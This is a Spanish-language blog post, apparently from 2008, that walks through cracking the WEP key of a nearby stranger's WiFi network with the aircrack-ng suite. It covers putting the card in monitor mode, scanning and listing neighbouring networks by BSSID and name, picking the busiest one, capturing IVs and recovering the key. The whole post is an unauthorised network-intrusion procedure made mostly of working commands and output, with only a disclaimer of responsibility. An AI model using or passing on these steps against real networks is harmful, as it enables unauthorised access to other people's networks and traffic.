Un amigo en la empresa donde me encuentro trabajando me dió algunos tips -por no decir que me enseñó- cómo descubrir claves WiFi. El tema requiere más paciencia que ciencia así que describiré el escenario.
Lo que aquí escribo es una constancia de las pruebas que realicé, no me hago responsable de nada ni por nadie. Las pruebas las realicé sobre kubuntu pero pueden funcionar con cualquier otra distro. Hay una distro que se llama Wifislax, está basada en Slackware sin embargo los programas que se usarán serán:
- airmon-ng
- aircrack-ng
- airodump-ng
- aireplay-ng
Todos estos programas se encuentran en aircrak-ng, para más información pueden descargar y leer desde aquí http://www.aircrack-ng.org/doku.php
Los pasos para descubrir claves es muy sencillo, aquí veremos un ejemplo paso por paso:
1. Paso inicial
Se debe cambiar el estado de la tarjeta de red wifi a modo MONITOR. En mi caso la tarjeta wifi es una Intel IPW2200 identificada como eth1 así que ejecuto:
airmon-ng start eth1
Debe observarse que el mensaje en pantalla indique que se tiene el modo monitor enable.
2. Descubriendo redes cercanas a las que posiblemente podamos conectarnos
Aquí pondré a escuchar y observar todas las redes e información relevante como ser, essid, bssid, channel y lo más importante el parámetro DATA. Sólo ejecuto lo siguiente:
airodump-ng eth1
En mi caso al hacer esto, apareció esta información:
CH 1 ][ Elapsed: 4 s ][ 2008-11-26 23:31
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1B:FC:DD:51:2E 175 0 2 0 6 -1 WEP WEP <length: 0>
00:1E:58:C1:32:A9 174 2 0 0 6 54. WEP WEP <length: 0>
00:14:D1:37:01:F9 175 2 0 0 6 54 WEP WEP cra1
00:0B:B4:EE:B0:45 173 2 0 0 6 54 WEP WEP default
00:17:9A:62:E0:D9 176 2 0 0 6 54. WEP WEP Masterchecho Net
00:19:5B:DA:BA:CC 177 4 0 0 6 54. WEP WEP uzta
00:02:CF:95:5E:F8 176 4 0 0 6 54. WEP WEP Depto
00:1D:7E:44:E9:53 178 6 0 0 6 48 WEP WEP Seis
00:19:5B:D9:29:CE 184 5 1 0 11 54. WEP WEP redcasa
00:0F:CB:FC:3E:62 174 4 1 0 1 54. WEP WEP <length: 0>
00:02:CF:CC:9F:FA 194 13 9 4 6 54. WEP WEP cramos
00:1C:F0:3B:5D:81 183 13 0 0 6 54. WPA TKIP PSK dlink
00:1B:FC:F1:E8:E4 185 7 120 52 6 48 WEP WEP jancab
BSSID STATION PWR Rate Lost Packets Probes
00:02:CF:CC:9F:FA 00:15:AF:7E:78:60 204 54-54 17 9
Observo que la conexión identificada con el essid jancab tiene en parámetro DATA mayor, es un buen indicio así que trabajaré con esa conexión.
3. Analizando la conexión:
Ejecutaré el siguiente comando para capturar la data sólo del enlace que deseo y almacenaré el tráfico capturado para un análisis posterior, este análisis se realizará con otro programa.
airodump-ng –ivs -w archivo_captura –channel 6 –bssid 00:1B:FC:F1:E8:E4
Es importante esperar que el campo data llegue a por lo menos 15,000. Esto puede demorar tiempo pero podemos generar tráfico inyectando paquetes con aireplay-ng. El sistema generará un archivo de nombre archivo_captura-01.ivs
4. Analizando la data captura
Ahora analizaré la data almacenada, si no logro obtener los resultados tendré que ejecutar nuevamente el paso anterior cuidando de borrar el archivo que contiene la data capturada para generar uno nuevo.
aircrack-ng archivo_captura-01.ivs
Aquí debo esperar un poco hasta que se muestre la clave o KEY. La clave se mostrará en el siguiente formato, por ejemplo: cb:c6:66:55:44
Al usar la clave obtenida se obvia los :
Así de simple….
